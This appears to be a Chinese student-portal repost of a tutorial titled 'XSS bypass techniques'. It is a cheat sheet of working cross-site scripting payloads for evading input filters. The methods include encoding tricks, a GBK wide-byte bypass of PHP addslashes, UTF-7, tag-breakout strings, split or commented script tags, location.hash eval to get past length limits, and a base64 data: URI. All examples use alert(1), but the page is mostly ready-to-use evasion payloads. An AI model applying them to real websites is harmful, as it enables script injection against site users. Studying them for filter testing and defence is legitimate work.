我的大学网
我的大学网

设为首页
加入收藏
联系我们

  首页    论坛   首页   首页   首页   首页  
大学男生 | 大学女生 | 菁菁校园 | 男生女生 | 奇闻趣事 | 求职&上班族 | 毕业&综合 | 考研考试 | 生活保健 | 理工& 电脑 | 人文&外语 | 网络资源 | 心灵之窗 | 资讯 | 时评&七嘴八舌 | 资料中心 | 爱情摩天轮
   
 
 
   
.  
 
.
 
 
您当前的位置:我的大学网 -> 理工& 电脑 -> 文章内容  
广告位
栏目导航
  • · 大学男生
  • · 大学女生
  • · 菁菁校园
  • · 男生女生
  • · 奇闻趣事
  • · 求职&上班族
  • · 毕业&综合
  • · 考研考试
  • · 生活保健
  • · 理工& 电脑
  • · 人文&外语
  • · 网络资源
  • · 心灵之窗
  • · 资讯
  • · 时评&七嘴八舌
  • · 资料中心
  • · 爱情摩天轮
  • · 吃喝玩乐
  • · 星座命理
  • · 视频分享
  • · 女性
  • · 待处理
  • · 影音娱乐
  • · 更多分类
  • zhouzeng我的大学网: www.zhouzeng.com.cn
    热力推荐
    我的大学网: www.zhouzeng.com.cn
    网络安全系列--XSS绕过技巧
    作者:www.zhouzeng.com.cn  来源:我的大学网  发布时间:2016-01-31 23:48:57  发布人:admin

    减小字体 增大字体

    baidu

    1、JavaScript中字符串之间的运算利用

    <a href="javascript:alert(1)//html">click me</a>

    <a href="javascript:alert(1)-html">click me</a>

    执行呈现相同的效果,因为javascript是弱类型语言,所以字符串与字符串之间的各种运算都是合法的

    2、HTML和JavaScript自解码机制

    一、document.write()情况

    HTML自解码机制,两种形式:①HTML实体编码;②进制编码(&#)

    [html] view plaincopy

    <html> <body> <input type="button" onclick="document.write('<img src=# onerror=alert(1) />')" /> <input type="button" onclick="document.write('&#编码')" /> <input type="button" onclick="document.write('HTML编码')" /> </body> </html>

    JavaScript自解码机制,三种形式:①Unicode形式(\uH,必须是4位数);②普通十六进制和八进制(\xH、/H);③纯转移(\"、\<、\>)

    [html] view plaincopy

    <html> <body> <input type="button" id="t"> <script> function $(id){return document.getElementById(id);} $('t').onclick=function(){ //document.write('<img src=# onerror=alert(1)>'); //document.write('\<img src=# onerror=alert(1)\>'); //document.write('\x3cimg src=# onerror=alert(1)\x3e'); //document.write('\74img src=# onerror=alert(1)\76'); document.write('\u003cimg src=# onerror=alert(1)\u003e'); } </script> </body> </html>

    特殊情况:

    <textarea>、<title>、<iframe>标签不解析HTML

    二、HTML属性在执行时会做HTMLDecode编码

    HTML属性:十进制和十六进制,8和Z形式

    CSS属性:十进制和十六进制,\6c形式

    JavaScript:八进制和十六进制,\56,和\x5c形式,汉字需要使用Unicode编码,\u0000形式

    <img src="http://www.baidu.com/img/bdlogo.gif">

    <img src="http://www.baidu.com/img/bdlogo.gif";>

    需要留出双引号,不可对双引号进行转移

    3、宽字节处理addslashs,单引号、双引号、反斜杠之前加反斜杠的情况

    [php] view plaincopy

    <?php header("Content-Type:text/html;charset=GBK");?> <script> var a="<?php echo addslashes($_GET['url']);?>"; </script> 构造:.php?url=123%81";alert(1);//

    原理:网页头部指明这是GBK编码,GBK编码第一字节的范围是0x81~0xFE,第二字节的范围是0x40~0x7E与0x80~0xFE,这样的十六进制表示。而\符号的十六进制表示为0x5C,正好是GBK的低字节中,如果之前有一个高字节,那么正好会被组成一个合法字符。

    4、UTF-7编码(仅IE支持,会自动判断是否出现UTF-7编码的字符串)

    [html] view plaincopy

    <html> <meta http-equiv="Content-Type" content="text/html; charset=UTF-7"> <body> +/v8APA-script+AD4-alert(1)+ADw-/script+AD4- </body> <html>

    5、标签的优先级

    <title><a href="</title><img src=# onerror=alert(1)//">

    var a="</script><script>alert(1)</script>b="";

    6、其他

    1、String.fromCharCode()

    <script>

    eval(alert(1)) --> eval(String.fromCharCode(97,108,101,114,116,40,49,41));

    document.write(String.fromCharCode(<img src=1 onerror>的ASCII码);

    </script>

    2、"h"+"t"+"t"+"p",绕过对http的过滤

    3、<input onfocus="alert(1)" autofocus>,自动执行

    4、<scr<script>ipt>绕过对<script>的过滤

    5、/**/绕过对空格的过滤<script>document.write("<img/**/src='1'/**/onerror='alert(1)'/>");</script>

    6、<script>标签中多对输入可以结合/**/的使用

    var a = "";/*"; 值为:";/*,(首先闭合双引号,然后使用/*注释,与下面注释进行闭合)var b = "*/alert(1)//"; 值为:*/alert(1)//

    7、如果是图片可能是判定后缀名在最后加上.jpg8、突破对长度的限制<script>eval(location.hash.slice(1))</script>#alert(‘a’)9、data协议,绕过chrome filter.php?url=<a href='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='>click<a>10、IE的注释方式<!--[if IE]><img src=# width=0 height=0 onerror=alert(/insight-labs/)><![endif]-->

    [ ] [返回上一页] [ 打 印] [收 藏]
    上一篇文章:
    下一篇文章:
          【CN帖】经验分享:怎么减轻初夜疼痛       校园网贷扼杀大学生创业潜力
    ∷相关文章评论∷   (评论内容只代表网友观点,与本站立场无关!) [发表评论]
     
     
     
    网络安全系列--XSS绕过技巧 大学男生|大学女生|男生女生|校园|求职考试|奇闻趣事|考研|生活|计算机学院|小说天地|高考|网络游戏|实用信息|爱情|感动|熟悉的陌生人|情侣|恋爱|大学生门户网站|大学生必上网站
    友情链接:   论坛  数据大学 首页   首页   首页   首页   首页   首页  首页  首页                                                
    Copyright © 2007-2010 顶部. All Rights Reserved .

    湘ICP备07501844号

    关于本站 - 网站帮助 - 广告合作(QQ联系) - 友情连接 - 网站地图 - 管理登录